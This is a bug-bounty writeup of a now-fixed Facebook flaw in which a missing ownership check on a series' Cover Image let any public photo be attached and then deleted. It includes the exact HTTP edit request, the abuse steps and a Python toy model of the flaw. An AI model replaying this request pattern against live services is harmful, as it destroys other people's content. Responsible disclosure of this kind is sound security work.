Delete Any Photos In Facebook

This post is about a bug I found on Facebook that could be used to delete any publicly visible photo by editing a series.

An image-removal vulnerability in the same series feature had already been found by another researcher, Pouya Darabi. This writeup describes a bypass of that fix in a different scenario.


A series has options to set a Poster Art photo (mandatory) and a Cover Image (optional).


When creating a new series, if an attacker tried to modify the photo object of the Poster Art or the Cover Image, server-side validation was performed properly and an error was returned. When editing an existing series, however, the ownership check for the Cover Image was missing, so any publicly visible photo ID on Facebook could be associated with the Cover Image.


Replacing the “custom_thumbnail_id=xxx” value with any photo ID causes that photo to be associated with the series.

POST /media/manager/shows/edit_show_metadata/?show_id=xxx&title=xxx&description=&custom_thumbnail_id=xxx&is_serialized=false&poster_art_id=xxx&session_id=xxx&av=xxx HTTP/1.1
Host: business.facebook.com
Connection: close
Content-Length: 467
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36
Viewport-Width: 2048
Content-Type: application/x-www-form-urlencoded
Accept: */*
Origin: https://business.facebook.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://business.facebook.com/creatorstudio/?tab=content_shows&collection_id=all_pages
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: sb=xxx; datr=xxx; dpr=1.25; c_user=xxx;
__user=xxx&__a=1&fb_dtsg=xxx

When the series is then deleted, all season videos, Poster Arts and Cover Images, including the victim’s photo, are deleted as well. Completely deleting the series takes around 30 to 45 seconds.
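To make the bug class concrete, here is an added toy model of the create, edit and delete paths (my own constructed example, not Facebook's code): the create path validates ownership of both photo objects, the edit path with fixed=False reproduces the missing Cover Image ownership check, and delete_show shows the cascade that removes the victim's photo. The user names and photo IDs are made up.

```python
# Added illustration, not Facebook's code: a constructed toy model showing
# why the cover-image ownership check must run on edit as well as create.
from dataclasses import dataclass
from typing import List, Optional
# Constructed sample data: photo id -> owning user id.
PHOTOS = {"p1": "attacker", "p2": "attacker", "p9": "victim"}


@dataclass
class Show:
    owner: str
    poster_art_id: str
    custom_thumbnail_id: Optional[str] = None


def owns(user: str, photo_id: Optional[str]) -> bool:
    """True if the photo is absent (cover image is optional) or owned by user."""
    return photo_id is None or PHOTOS.get(photo_id) == user


def create_show(user: str, poster_art_id: str,
                custom_thumbnail_id: Optional[str] = None) -> Show:
    # Create path: both photo objects are validated (as the writeup observed).
    if not (owns(user, poster_art_id) and owns(user, custom_thumbnail_id)):
        raise PermissionError("photo not owned by requester")
    return Show(user, poster_art_id, custom_thumbnail_id)


def edit_show_metadata(show: Show, user: str, custom_thumbnail_id: Optional[str],
                       fixed: bool = True) -> bool:
    """Return True if the edit is accepted. fixed=False models the bug: the
    edit path checked show ownership but not ownership of the cover image."""
    if show.owner != user:
        raise PermissionError("not the show owner")
    if fixed and not owns(user, custom_thumbnail_id):
        return False
    show.custom_thumbnail_id = custom_thumbnail_id
    return True


def delete_show(show: Show, user: str) -> List[str]:
    """Cascade-delete the show's media; returns the photo ids removed."""
    if show.owner != user:
        raise PermissionError("not the show owner")
    removed = [p for p in (show.poster_art_id, show.custom_thumbnail_id)
               if p is not None and p in PHOTOS]
    for p in removed:
        del PHOTOS[p]
    return removed
```

With the bug modelled (fixed=False), a victim's photo attached through the edit path is removed by the cascade in delete_show; with the check in place the edit is rejected and nothing foreign is touched.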


This issue was reported as a BountyCon2020 event submission. Thank you to the Facebook team for quickly addressing and fixing it.

Video PoC:

Timeline:

05-Oct-2020: Report sent

05-Oct-2020: Further investigation by Facebook and temporary fix

10-Oct-2020: $10,000 bounty + $750 bonus awarded by Facebook

31-Oct-2020: Fix confirmed by Facebook and me
